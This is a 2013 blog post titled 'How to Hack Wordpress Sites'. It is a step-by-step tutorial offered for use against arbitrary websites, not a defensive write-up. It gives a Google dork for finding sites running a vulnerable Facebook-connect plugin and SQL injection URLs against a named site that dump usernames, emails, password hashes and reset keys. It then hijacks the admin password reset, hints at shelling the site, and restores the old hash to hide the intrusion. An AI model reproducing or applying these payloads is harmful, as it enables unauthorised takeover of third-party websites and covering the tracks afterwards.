Friday, July 12, 2013

How to Hack Wordpress Sites

0 comments
So .. lets start .. 
Things u need

1) any wordpress sqli dork .. (u can get it from exploit-db.com)
2) knowledge of sqli .. (coz this thread is not about sqli)
3) my help .. hehe


1) My Dork

There are number of sqli exploits in different plugins and themes of wordpress. The exploit im picking is in one of the plugins called Wp-FacebookConnect..
and the google dork for it is ..



Code:
inurl:"/?fbconnect_action=myhome"

now paste this code in google.com (one of my best frnds)
and u will see no. of vulnerable websites ..

2) now the website im going to use here is ..

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2




here the parameter userid is vulnerable to sqli ..

so lets see what we can get from the data base ..

im going to change the above URL with this

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email)​,7,8,9,10,11,12+from+wp_users--

now u can see we got the username with the email id .. 




now if i change the above URL to this ..

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),​7,8,9,10,11,12+from+wp_users--

im going to get the user name and the hashed password ..




(point to be noted here .. im using concat here .. u can also use group_concat to get all the users..
again .. that would be ur knowledge how u use sqli)

now .. we all know that wordpress hashes belong to the category MD5(wordpress).. (different from simple MD5)
and are very hard to crack ..

but if ur mad .. u should think out of the box ..

so now follow the steps ..

a) go to the login page of of wordpress site .. in my case that would be ..

Code:
http://masaru.ikeda.me/wp-login.php

b) click on Lost your password ?























c) now the wordpress will ask me for the username or email .. for which i want to reset the password .. in my case that is 'masaru' .. so go ahead and enter the username .. 



d) now look closely .. it says .. "Check your e-mail for the confirmation link."



e) now what wordpress does actually .. it sends an activation key to the email address of that user .. and it sets the value of activation key in the database aswell .. what u have to do is just to get that key ..

f) so now im going to change my URL to this .. to get the activation key ..

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa​tion_key),7,8,9,10,11,12+from+wp_users--

and u can see .. we got the activation key here .. u should note it down somewhere .. 




g) Now .. finally all we have to do is .. without going to the email address .. reset the password .. for that im going to add this to my URL ..

Code:
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

and im going to replace the KEYHERE with the activation key i got .. and the USERNAME HERE with the username .. which in my case is 'masaru' .. so my URL will be ..

Code:
http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru

and VOILA .. the wordpress will ask u for ur new password .. 




now go the login page again .. and try the new password .. and there u go .. u got access to 





now u know how to shell the wordpress site .. don't u ??

Trick for those .. who are actually MAD:
1) Now to chk quickly if a website is using the latest version 3.4.2 or previous versions .. goto the login page and see .. if there is an option there to go back to the main page of the blog.. like in my case see the option .. <- Back to Digital Way of Living then this is not 3.4.2 ... if u don't see this option .. then it is 3.4.2 .. this trick is not legit .. i figured it out .. and is working for me .. 





2) once u have shelld the website .. get the database details .. use any database connector .. go to the table .. wp_user .. and in the column wp_pass .. replace the hash with the one u got in the very beginning .. the actual hash of the admin .. now the password will be again what it was before .. as nothing happened .. admin will never know what hit 'em ..

Now .. in the latest version .. 3.4.2 .. what happens actually .. that after confirming the activation key wordpress don't let you choose a new password .. rather . it actually sends u a random password on ur Email ..
yea i know its sad .. but don't worry .. someone will definitely discover any new way to work this out ..

thank u so much for viewing this thread .. if u find any trouble doing this .. hit me on FB /contact details in my sig ..


and lastly .. some MADS out there .. worth mentioning ..